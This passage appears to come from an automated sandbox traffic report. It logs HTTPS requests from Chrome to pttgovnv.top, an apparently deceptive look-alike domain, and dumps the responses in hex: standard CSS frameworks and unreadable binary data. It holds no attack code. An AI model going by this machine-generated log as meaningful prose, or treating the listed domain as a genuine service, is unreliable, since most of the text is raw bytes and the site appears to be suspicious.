          Data Ascii: z]v!''VDJ~I?Ky-pI]r0r@p]}DlXkl*=*^}ZJxR^fJbN>EIvT\(Tvppl*d*;<pL\U>7;MH.M4>(`-aJZ/7Try~k*Tsq!8)m"~+
          2024-09-01 22:25:15 UTC1369INData Raw: b9 ad d8 23 3f 28 d6 fe 0c de 4c ee bd be 19 2e 71 0a 01 ea 04 bb ee f2 42 70 02 32 d6 e5 f1 2c ae cf 47 9b 6d 65 f4 97 a5 d6 5b f6 cb a4 f3 63 50 62 34 f6 5d 76 57 21 40 79 ae ef c9 d8 f0 c4 71 2d c9 23 38 01 99 eb 3c 3c a9 62 73 75 33 08 c7 75 6c d9 6f 96 4d fb e5 32 8a 43 63 a9 3a ad 87 00 15 3e 2f 8c 2c 48 1e c1 09 18 81 70 38 ee bc 8b 30 73 36 3c ad c8 ff 9f ea 8b e5 66 a9 f4 54 19 bd 99 f3 d9 67 54 9d d6 e7 83 bc d9 1d f3 59 78 bc 5f d2 46 70 02 46 c2 85 a7 cf cd 41 57 37 ac 75 6e 06 72 d3 54 aa b4 37 4e 1b a6 94 b2 7f 99 69 aa 7d 52 ee 20 62 ad 8e b4 36 0b ad 8b 03 b6 9e 57 33 f6 c3 84 99 f7 94 2e 82 13 30 32 cb 17 b7 f7 ba 5a 2e a9 f3 24 ed 2a 53 9f a9 a9 99 94 53 7b 33 f9 52 aa 53 f2 7a 0c 37 54 17 8e 84 36 6e 69 a5 28 8b b9 fd b3 1e 11 92 da e3
          Data Ascii: #?(L.qBp2,Gme[cPb4]vW!@yq-#8<<bsu3uloM2Cc:>/,Hp80s6<fTgTYx_FpFAW7unrT7Ni}R b6W3.02Z.$*SS{3RSz7T6ni(
          2024-09-01 22:25:15 UTC1369INData Raw: 11 2e 3c 7d 5e 2e 2e 5b ee 0a b3 94 16 85 2e e7 aa 98 2c 62 0e 13 e6 c5 9f b6 4a a3 e5 60 d6 c6 c1 d9 2d 55 68 b3 4d 9f 07 aa 58 55 72 c3 65 f2 8c 52 2f 27 77 5f b1 39 a6 43 04 27 f4 4b fa 98 de 2b 59 96 7b 18 5e e9 90 79 a2 ee 6f cc c2 45 36 64 4b be ec 2e 5b 77 a9 eb 6c 55 4a fd ae 16 31 f5 41 f8 4a 5a 39 6b 6b f9 4e 96 32 8b 0f 7a 9b 5e 0f ac e3 bc 4a 6e ea 64 f7 a0 ec 22 0c 97 68 19 c1 09 fd d9 3f 94 86 4c 19 62 d9 5e 1f d3 65 32 1e 82 59 35 3c 9d 25 8d d5 36 4c 2d ec ef 16 85 fd 2b 86 ca 94 5b be 2b dd ee bb c6 e7 0e ca bf 5f 61 8a 6d 96 2c b0 0e bf 74 ec 2a b9 fd 7c 37 75 cc 55 5f 69 14 ef 0c c1 09 dd 93 63 52 b4 96 a7 9f 0e fa 98 2e f5 46 dd 9f 66 7b f4 8a ec 52 33 85 f9 39 5c 36 e6 2a 53 32 68 54 96 f9 24 4c 99 e2 68 88 e0 e1 76 df 15 2e 40 35 ae
          Data Ascii: .<}^..[.,bJ`-UhMXUreR/'w_9C'K+Y{^yoE6dK.[wlUJ1AJZ9kkN2z^Jnd"h?Lb^e2Y5<%6L-+[+_am,t*|7uU_icR.Ff{R39\6*S2hT$Lhv.@5
          2024-09-01 22:25:15 UTC1369INData Raw: 50 13 c1 29 57 d2 c7 a4 b5 2c 1b 7c ed 5f 80 fd ba 78 62 83 13 5f 16 97 90 10 53 7e 61 76 ed 17 43 6b 3b 2c 8d 32 8f a4 a1 36 5c ae cd 2d f1 fd ae 6e 9a 49 39 b5 5f f4 5f da af ab a9 fd 1f b3 bf 1a 1b ac ba ab 52 f9 e6 76 ed cf f4 d2 c6 85 a2 a2 2c e6 f6 db f2 2d 67 7d e1 34 57 3d d5 e6 30 5c 26 c3 7e 9e 7e b1 c1 89 5e a7 9a 08 4e b9 71 f3 98 d4 cc 86 a6 ef c3 2b 58 31 ea a5 7a 30 a5 49 7c 0d 6e bb bd d1 8f c3 65 63 d2 84 3e b9 fb 6a 3b 5c b6 c6 ed 6a 73 61 2a d0 e5 cd 52 ab 2b 7b d9 b4 84 a0 65 f1 51 08 a2 72 84 3a 64 73 40 9b 0f 1a 7d 29 ee be e2 fe 5f 13 3f b8 9c 3c 3d b4 37 26 37 c4 72 bc 7d 4c 57 b9 3f e5 3d bf a6 b6 fb 9e e4 29 b7 f8 4d 6f d1 03 84 9c a4 da eb 24 c7 30 51 41 ad 87 71 04 39 90 3e a6 a7 0b 39 57 ee 07 42 d3 15 e4 67 85 b5 48 05 a6 f8
          Data Ascii: P)W,|_xb_S~avCk;,26\-nI9__Rv,-g}4W=0\&~~^Nq+X1z0I|nec>j;\jsa*R+{eQr:ds@})_?<=7&7r}LW?=)Mo$0QAq9>9WBgH
          2024-09-01 22:25:15 UTC1369INData Raw: 33 cb 3a 53 4e a8 ba d6 40 c5 69 1d 72 a6 d9 52 ef da 9f 16 13 bf 73 c6 72 5d 92 8e ab 50 46 6f db 2f b4 da e3 3f 8e ab 50 f6 2f 7d ef 25 4d b3 68 cd f2 c5 ad 1d ad e2 db 38 a4 3f e8 3f 44 b1 64 bd 7f b8 a5 ee 6f 24 53 f9 22 38 5d c6 2d cb b9 c0 44 1f d3 18 b0 5c 97 3c f3 fc ce b4 54 66 db fe 4e 7a a1 ea 2f e5 29 f5 52 66 f0 c8 f4 67 96 f2 d0 94 ec ec 94 4d 0a e1 32 1a c5 dd 57 71 64 80 a7 8b b7 6a 62 36 d5 df 37 92 78 60 21 38 5d e4 e9 e1 8e fd f1 d0 c7 34 2e cf d4 fd 29 4b 76 99 20 44 21 26 b1 f5 39 c9 f2 a1 ec 5c 0d 97 c3 da 5f 18 fb 41 7b a9 1e 4c 93 38 74 98 e0 74 96 94 0c 95 de b5 bf 6b 34 80 0f 89 32 e6 8f ea c1 06 37 c7 cc b4 19 a2 ec df 0f 0a 63 43 14 cb 79 a8 40 7a e9 64 3c 46 b8 1c 9c f4 07 4e ee be 1a be b7 4f 56 76 de eb ff e7 2f cc 77 ea fe
          Data Ascii: 3:SN@irRsr]PFo/?P/}%Mh8??Ddo$S"8]-D\<TfNz/)RfgM2Wqdjb67x`!8]4.)Kv D!&9\_A{L8ttk427cCy@zd<FNOVv/w
          2024-09-01 22:25:15 UTC1369INData Raw: b3 a9 3a 6d 31 9a 00 40 1b dc 61 cf 3d 32 f6 01 36 c2 a9 f2 d5 2b 4e c7 86 9d ed 14 67 70 92 3e 26 7f 74 07 7d 4c 75 ac 1a bf ef 4f b7 ba 69 fc ae 20 97 aa 93 1f 4d 40 af 13 80 16 d8 fb 5b 8f 8a d8 46 c4 54 6d 0c ff d4 8d 21 bf 8f e3 0a 4e b2 7b 49 4e d8 a7 8f a9 2e 99 f8 fd 6d e7 8d df 95 e5 52 75 a2 49 1c 40 5a 8c 31 bf ea 7b af 63 9b ad d7 7c a7 b2 e4 04 69 e5 19 40 1c c1 c9 8f 17 90 79 4c 72 66 0d 7d 4c 55 f9 89 df 8f c2 c4 ef d8 3e 20 ab aa 53 fa d3 c4 25 cc bb 43 a3 01 a0 01 6d fa 7b b0 d5 2a 9a f9 47 c7 ea ec a8 3b cf 72 98 46 f1 61 83 93 ac 51 ee 1f ee da c0 f4 3f fb 83 a4 8f a9 0e 09 24 7e e2 77 e4 55 9d 5c e6 3a d1 24 0e 20 1d f1 35 85 5b a6 76 63 f8 c7 24 37 0c f0 30 3b 5c 70 92 41 56 d2 c7 24 a3 d4 51 9d ef 63 fa a3 1b 60 39 58 e3 77 05 ae d7
          Data Ascii: :m1@a=26+Ngp>&t}LuOi M@[FTm!N{IN.mRuI@Z1{c|i@yLrf}LU> S%Cm{*G;rFaQ?$~wU\:$ 5[vc$70;\pAV$Qc`9Xw
          2024-09-01 22:25:15 UTC1369INData Raw: 83 76 63 d8 4d 77 91 86 df cb 27 bb ea 56 e1 09 9e 84 48 69 fc be e6 d6 43 59 72 19 4a ea 67 d9 49 69 b8 c3 c3 26 01 a4 c7 fc e7 4e ad fe 24 59 a2 8b 7f 66 53 b0 8c f8 c0 e1 86 df cb 1f cf 71 92 f0 24 d5 95 b1 93 c6 6f df 40 b6 43 1f 53 04 ae b9 aa d3 1b 7f 91 22 fd b0 cd 19 22 00 12 f7 bb aa 1c 9c d2 5a a2 73 22 6f 53 a8 7f 08 f0 a7 03 30 a5 ba 32 d6 f0 24 cd c8 85 d9 70 8d df f4 31 c5 43 c2 6b 61 d2 ee 15 92 19 22 2c d9 01 a8 21 a9 25 3a 31 d4 d9 74 55 2d 55 ad c2 c8 a7 c1 49 8c 31 3c 49 f3 b7 34 7e 4b d5 0d f1 71 ff 5d cc 77 e1 2a 45 37 58 b2 03 50 47 a1 8a ad 64 96 e8 9c 04 06 73 4a a1 a4 66 81 e4 fc e0 24 c6 16 9e b4 ba e3 ce e7 43 bc 92 1f 51 c0 92 1d 00 4b 97 6b 2f d5 b9 41 97 f7 5e a6 f3 40 ef 2b eb 5f fb 8b 98 99 96 7a 9c ce 72 4d d1 e6 1b fb 5f
          Data Ascii: vcMw'VHiCYrJgIi&N$YfSq$o@CS""Zs"oS02$p1Cka",!%:1tU-UI1<I4~Kq]w*E7XPGdsJf$CQKk/A^@+_zrM_
          2024-09-01 22:25:15 UTC1369INData Raw: fa 6a f4 4f 34 fa 46 42 fa 85 52 ac 3c 31 e3 09 40 1f e4 3b 46 47 58 6d 72 59 c1 0c 72 ba 42 3c c1 49 3c d8 98 db 1f c4 48 26 8d eb c7 ec b8 8b 44 ba e1 89 73 12 01 74 eb 9d 92 87 fc 1b fe 22 26 66 66 bf bb 07 19 28 1a cf 52 dd 69 7e 58 e1 ae fd d3 e5 3f 2c 53 42 a2 4c 56 67 c7 dd f0 d2 5d b6 e3 3d 04 a0 7d f1 0e bb 7c a6 ee 4f 07 3b cb 33 ae 8a d3 8a 6f 1a 1f c7 b0 4c 0e 08 8e 07 95 27 00 38 45 c7 b8 2a f2 c6 1d a3 35 a0 38 83 d3 8a f4 3d 15 66 23 fb be a7 d5 01 c1 52 f1 c0 b0 08 4f 00 20 1b b6 b6 ec f7 ca df c2 55 3c 8a e1 67 22 c6 1d 9c c4 c9 bc a7 5f c2 2b 79 92 66 5f 8e 69 89 03 e1 09 c0 98 b9 ef 10 bd 1b ae e2 31 c0 e8 81 f3 c4 d9 e3 74 11 09 15 72 8c 49 fe 9e b9 52 24 3d 2b c3 a2 e7 09 c0 18 ed 1f da d0 a4 1f 86 ab 58 0c da d7 74 5a 5a c1 49 b8 e9
          Data Ascii: jO4FBR<1@;FGXmrYrB<I<H&Dst"&ff(Ri~X?,SBLVg]=}|O;3oL'8E*58=f#RO U<g"_+yf_i1trIR$=+XtZZI


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          7192.168.2.449745184.28.90.27443
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:16 UTC239OUTGET /fs/windows/config.json HTTP/1.1
          Connection: Keep-Alive
          Accept: */*
          Accept-Encoding: identity
          If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
          Range: bytes=0-2147483646
          User-Agent: Microsoft BITS/7.8
          Host: fs.microsoft.com
          2024-09-01 22:25:16 UTC515INHTTP/1.1 200 OK
          ApiVersion: Distribute 1.1
          Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
          Content-Type: application/octet-stream
          ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
          Last-Modified: Tue, 16 May 2017 22:58:00 GMT
          Server: ECAcc (lpl/EF06)
          X-CID: 11
          X-Ms-ApiVersion: Distribute 1.2
          X-Ms-Region: prod-weu-z1
          Cache-Control: public, max-age=152424
          Date: Sun, 01 Sep 2024 22:25:16 GMT
          Content-Length: 55
          Connection: close
          X-CID: 2
          2024-09-01 22:25:16 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
          Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          8192.168.2.449748172.67.174.217443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:16 UTC557OUTGET /help/assets/2dd339f2kFGym.css HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          sec-ch-ua-mobile: ?0
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          sec-ch-ua-platform: "Windows"
          Accept: text/css,*/*;q=0.1
          Sec-Fetch-Site: same-origin
          Sec-Fetch-Mode: no-cors
          Sec-Fetch-Dest: style
          Referer: https://pttgovnv.top/help/
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:16 UTC750INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:16 GMT
          Content-Type: text/css; charset=utf-8
          Transfer-Encoding: chunked
          Connection: close
          Vary: Accept-Encoding
          Access-Control-Allow-Origin: *
          Cache-Control: public, max-age=86400
          Last-Modified: Wed, 29 May 2024 10:14:42 GMT
          ETag: W/"d0ef-18fc3d84650"
          CF-Cache-Status: HIT
          Age: 37057
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FgCPGZDCbIuHr8%2BkWq5Jhu5whW%2Fp6IZHYoNZ4E7T%2FUIEu7Y%2BuSJiAjGOFz%2B%2FjahFCQYFX9u4jRZSN6EwMKbqjZawTD4kQdOSLHpoTlXmh4kyIVIC46biE142fLNlW2g%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8acdd9d257cb1-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:16 UTC619INData Raw: 37 63 63 32 0d 0a 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 37 36 37 70 78 29 7b 2e 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 39 30 70 78 7d 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 37 36 39 70 78 29 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 31 30 34 37 70 78 29 7b 2e 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 38 30 70 78 7d 7d 62 6f 64 79 20 23 73 34 2d 72 69 62 62 6f 6e 72 6f 77 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 34 36 38 70 78 29 7b 23 77 65 62 6f 62 6a 5f 70 6f 72 74 61 6c 7b 70 61 64 64
          Data Ascii: 7cc2@media screen and (min-width: 767px){.main-content{margin-top:90px}}@media screen and (min-width: 769px) and (max-width: 1047px){.main-content{margin-top:180px}}body #s4-ribbonrow{display:none}@media screen and (max-width: 468px){#webobj_portal{padd
          2024-09-01 22:25:16 UTC1369INData Raw: 65 66 74 3a 31 30 70 78 7d 69 6e 70 75 74 5b 74 79 70 65 3d 62 75 74 74 6f 6e 5d 3a 68 6f 76 65 72 2c 69 6e 70 75 74 5b 74 79 70 65 3d 72 65 73 65 74 5d 3a 68 6f 76 65 72 2c 69 6e 70 75 74 5b 74 79 70 65 3d 73 75 62 6d 69 74 5d 3a 68 6f 76 65 72 2c 62 75 74 74 6f 6e 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 39 32 63 30 65 30 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 36 66 32 66 61 7d 69 6e 70 75 74 5b 74 79 70 65 3d 62 75 74 74 6f 6e 5d 3a 61 63 74 69 76 65 2c 69 6e 70 75 74 5b 74 79 70 65 3d 72 65 73 65 74 5d 3a 61 63 74 69 76 65 2c 69 6e 70 75 74 5b 74 79 70 65 3d 73 75 62 6d 69 74 5d 3a 61 63 74 69 76 65 2c 62 75 74 74 6f 6e 3a 61 63 74 69 76 65 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 32 61 38 64 64 34 3b 62
          Data Ascii: eft:10px}input[type=button]:hover,input[type=reset]:hover,input[type=submit]:hover,button:hover{border-color:#92c0e0;background-color:#e6f2fa}input[type=button]:active,input[type=reset]:active,input[type=submit]:active,button:active{border-color:#2a8dd4;b
          2024-09-01 22:25:16 UTC1369INData Raw: 0a 2a 20 68 74 74 70 3a 2f 2f 6a 71 75 65 72 79 75 69 2e 63 6f 6d 0a 2a 20 49 6e 63 6c 75 64 65 73 3a 20 63 6f 72 65 2e 63 73 73 2c 20 61 63 63 6f 72 64 69 6f 6e 2e 63 73 73 2c 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 2e 63 73 73 2c 20 6d 65 6e 75 2e 63 73 73 2c 20 62 75 74 74 6f 6e 2e 63 73 73 2c 20 63 6f 6e 74 72 6f 6c 67 72 6f 75 70 2e 63 73 73 2c 20 63 68 65 63 6b 62 6f 78 72 61 64 69 6f 2e 63 73 73 2c 20 64 61 74 65 70 69 63 6b 65 72 2e 63 73 73 2c 20 64 69 61 6c 6f 67 2e 63 73 73 2c 20 64 72 61 67 67 61 62 6c 65 2e 63 73 73 2c 20 72 65 73 69 7a 61 62 6c 65 2e 63 73 73 2c 20 70 72 6f 67 72 65 73 73 62 61 72 2e 63 73 73 2c 20 73 65 6c 65 63 74 61 62 6c 65 2e 63 73 73 2c 20 73 65 6c 65 63 74 6d 65 6e 75 2e 63 73 73 2c 20 73 6c 69 64 65 72 2e 63 73 73 2c
          Data Ascii: * http://jqueryui.com* Includes: core.css, accordion.css, autocomplete.css, menu.css, button.css, controlgroup.css, checkboxradio.css, datepicker.css, dialog.css, draggable.css, resizable.css, progressbar.css, selectable.css, selectmenu.css, slider.css,
          2024-09-01 22:25:16 UTC1369INData Raw: 61 63 69 74 79 46 69 6c 74 65 72 53 68 61 64 6f 77 3d 41 6c 70 68 61 28 4f 70 61 63 69 74 79 25 33 44 33 30 29 26 6f 70 61 63 69 74 79 46 69 6c 74 65 72 4f 76 65 72 6c 61 79 3d 41 6c 70 68 61 28 4f 70 61 63 69 74 79 25 33 44 33 30 29 26 6f 70 61 63 69 74 79 53 68 61 64 6f 77 50 65 72 63 3d 33 30 26 6f 70 61 63 69 74 79 4f 76 65 72 6c 61 79 50 65 72 63 3d 33 30 26 69 63 6f 6e 43 6f 6c 6f 72 48 6f 76 65 72 3d 25 32 33 35 35 35 35 35 35 26 69 63 6f 6e 43 6f 6c 6f 72 48 69 67 68 6c 69 67 68 74 3d 25 32 33 37 37 37 36 32 30 26 69 63 6f 6e 43 6f 6c 6f 72 48 65 61 64 65 72 3d 25 32 33 34 34 34 34 34 34 26 69 63 6f 6e 43 6f 6c 6f 72 45 72 72 6f 72 3d 25 32 33 63 63 30 30 30 30 26 69 63 6f 6e 43 6f 6c 6f 72 44 65 66 61 75 6c 74 3d 25 32 33 37 37 37 37 37 37 26 69
          Data Ascii: acityFilterShadow=Alpha(Opacity%3D30)&opacityFilterOverlay=Alpha(Opacity%3D30)&opacityShadowPerc=30&opacityOverlayPerc=30&iconColorHover=%23555555&iconColorHighlight=%23777620&iconColorHeader=%23444444&iconColorError=%23cc0000&iconColorDefault=%23777777&i
          2024-09-01 22:25:16 UTC1369INData Raw: 6f 6c 6f 72 48 6f 76 65 72 3d 25 32 33 65 64 65 64 65 64 26 66 63 44 65 66 61 75 6c 74 3d 25 32 33 34 35 34 35 34 35 26 62 6f 72 64 65 72 43 6f 6c 6f 72 44 65 66 61 75 6c 74 3d 25 32 33 63 35 63 35 63 35 26 62 67 43 6f 6c 6f 72 44 65 66 61 75 6c 74 3d 25 32 33 66 36 66 36 66 36 0a 2a 20 43 6f 70 79 72 69 67 68 74 20 6a 51 75 65 72 79 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 3b 20 4c 69 63 65 6e 73 65 64 20 4d 49 54 20 2a 2f 2e 75 69 2d 74 61 62 73 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 70 61 64 64 69 6e 67 3a 2e 32 65 6d 7d 2e 75 69 2d 77 69 64 67 65 74 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f
          Data Ascii: olorHover=%23ededed&fcDefault=%23454545&borderColorDefault=%23c5c5c5&bgColorDefault=%23f6f6f6* Copyright jQuery Foundation and other contributors; Licensed MIT */.ui-tabs{position:relative;padding:.2em}.ui-widget{font-family:Arial,Helvetica,sans-serif;fo
          2024-09-01 22:25:16 UTC1369INData Raw: 6e 64 65 72 6c 69 6e 65 7d 61 3a 66 6f 63 75 73 7b 6f 75 74 6c 69 6e 65 3a 74 68 69 6e 20 64 6f 74 74 65 64 3b 6f 75 74 6c 69 6e 65 3a 35 70 78 20 61 75 74 6f 20 2d 77 65 62 6b 69 74 2d 66 6f 63 75 73 2d 72 69 6e 67 2d 63 6f 6c 6f 72 3b 6f 75 74 6c 69 6e 65 2d 6f 66 66 73 65 74 3a 2d 32 70 78 7d 69 6d 67 7b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 7d 2e 73 72 2d 6f 6e 6c 79 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 77 69 64 74 68 3a 31 70 78 3b 68 65 69 67 68 74 3a 31 70 78 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 2d 31 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 63 6c 69 70 3a 72 65 63 74 28 30 2c 30 2c 30 2c 30 29 3b 62 6f 72 64 65 72 3a 30 7d 68 31 2c 68 33 7b 66 6f 6e 74 2d 66 61 6d 69 6c
          Data Ascii: nderline}a:focus{outline:thin dotted;outline:5px auto -webkit-focus-ring-color;outline-offset:-2px}img{vertical-align:middle}.sr-only{position:absolute;width:1px;height:1px;padding:0;margin:-1px;overflow:hidden;clip:rect(0,0,0,0);border:0}h1,h3{font-famil
          2024-09-01 22:25:16 UTC1369INData Raw: 77 69 64 74 68 3a 38 2e 33 33 33 33 33 33 33 33 25 7d 7d 2e 63 6f 6c 6c 61 70 73 65 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 7d 2e 64 72 6f 70 64 6f 77 6e 2d 6d 65 6e 75 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 31 30 30 25 3b 6c 65 66 74 3a 30 3b 7a 2d 69 6e 64 65 78 3a 31 30 30 30 3b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 66 6c 6f 61 74 3a 6c 65 66 74 3b 6d 69 6e 2d 77 69 64 74 68 3a 31 36 30 70 78 3b 6d 61 72 67 69 6e 3a 32 70 78 20 30 20 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 3b 6c 69 73 74 2d 73 74 79 6c 65 3a 6e 6f 6e 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6c 69 70 3a
          Data Ascii: width:8.33333333%}}.collapse{display:none;visibility:hidden}.dropdown-menu{position:absolute;top:100%;left:0;z-index:1000;display:none;float:left;min-width:160px;margin:2px 0 0;text-align:left;list-style:none;background-color:#fff;-webkit-background-clip:
          2024-09-01 22:25:16 UTC1369INData Raw: 74 7d 2e 6e 61 76 62 61 72 2d 63 6f 6c 6c 61 70 73 65 2e 63 6f 6c 6c 61 70 73 65 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 30 7d 2e 6e 61 76 62 61 72 2d 73 74 61 74 69 63 2d 74 6f 70 20 2e 6e 61 76 62 61 72 2d 63 6f 6c 6c 61 70 73 65 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 7d 7d 2e 6e 61 76 62 61 72 2d 73 74 61 74 69 63 2d 74 6f 70 7b 7a 2d 69 6e 64 65 78 3a 31 30 30 30 3b 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 30 20 30 20 31 70 78 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 37 36 38 70 78 29 7b 2e 6e 61 76 62 61 72 2d 73 74 61 74 69 63 2d 74 6f 70 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 7d 7d 2e 6e 61 76 62 61 72 2d 62 72 61 6e 64 3a 66 6f 63 75 73 2c 2e 6e 61 76 62 61 72 2d
          Data Ascii: t}.navbar-collapse.collapse{padding-bottom:0}.navbar-static-top .navbar-collapse{padding-right:0;padding-left:0}}.navbar-static-top{z-index:1000;border-width:0 0 1px}@media (min-width:768px){.navbar-static-top{border-radius:0}}.navbar-brand:focus,.navbar-
          2024-09-01 22:25:16 UTC1369INData Raw: 65 20 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 7d 2e 6e 61 76 62 61 72 2d 69 6e 76 65 72 73 65 20 2e 6e 61 76 62 61 72 2d 74 6f 67 67 6c 65 3a 66 6f 63 75 73 2c 2e 6e 61 76 62 61 72 2d 69 6e 76 65 72 73 65 20 2e 6e 61 76 62 61 72 2d 74 6f 67 67 6c 65 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 33 33 7d 2e 6e 61 76 62 61 72 2d 69 6e 76 65 72 73 65 20 2e 6e 61 76 62 61 72 2d 74 6f 67 67 6c 65 20 2e 69 63 6f 6e 2d 62 61 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 7d 2e 6e 61 76 62 61 72 2d 69 6e 76 65 72 73 65 20 2e 6e 61 76 62 61 72 2d 63 6f 6c 6c 61 70 73
          Data Ascii: e .navbar-nav>li>a:hover{color:#fff;background-color:transparent}.navbar-inverse .navbar-toggle:focus,.navbar-inverse .navbar-toggle:hover{background-color:#333}.navbar-inverse .navbar-toggle .icon-bar{background-color:#fff}.navbar-inverse .navbar-collaps
          2024-09-01 22:25:16 UTC1369INData Raw: 74 74 70 3a 2f 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 69 6f 20 2d 20 40 66 6f 6e 74 61 77 65 73 6f 6d 65 0a 2a 20 20 4c 69 63 65 6e 73 65 20 2d 20 68 74 74 70 3a 2f 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 69 6f 2f 6c 69 63 65 6e 73 65 20 28 46 6f 6e 74 3a 20 53 49 4c 20 4f 46 4c 20 31 2e 31 2c 20 43 53 53 3a 20 4d 49 54 20 4c 69 63 65 6e 73 65 29 0a 2a 2f 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 6e 65 74 69 78 3b 73 72 63 3a 75 72 6c 28 2e 2f 66 31 38 65 34 32 62 61 6b 46 47 79 6d 2e 77 6f 66 66 29 66 6f 72 6d 61 74 28 22 77 6f 66 66 22 29 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 7d 2e 73 78 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 6e 65 74 69 78 3b 73 70 65 61 6b
          Data Ascii: ttp://fontawesome.io - @fontawesome* License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License)*/@font-face{font-family:snetix;src:url(./f18e42bakFGym.woff)format("woff");font-weight:400;font-style:normal}.sx{font-family:snetix;speak


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          9192.168.2.449747172.67.174.217443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:16 UTC557OUTGET /help/assets/4cd1ec68kFGym.css HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          sec-ch-ua-mobile: ?0
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          sec-ch-ua-platform: "Windows"
          Accept: text/css,*/*;q=0.1
          Sec-Fetch-Site: same-origin
          Sec-Fetch-Mode: no-cors
